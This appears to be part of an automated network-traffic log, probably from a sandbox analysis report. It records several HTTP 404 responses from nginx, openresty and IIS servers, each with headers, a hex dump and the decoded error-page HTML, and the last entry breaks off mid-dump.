Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:06 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:06 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:24:12 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:24:12 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:17 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:24:17 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:24:26 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:24:27 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:24:27 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:24:21 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
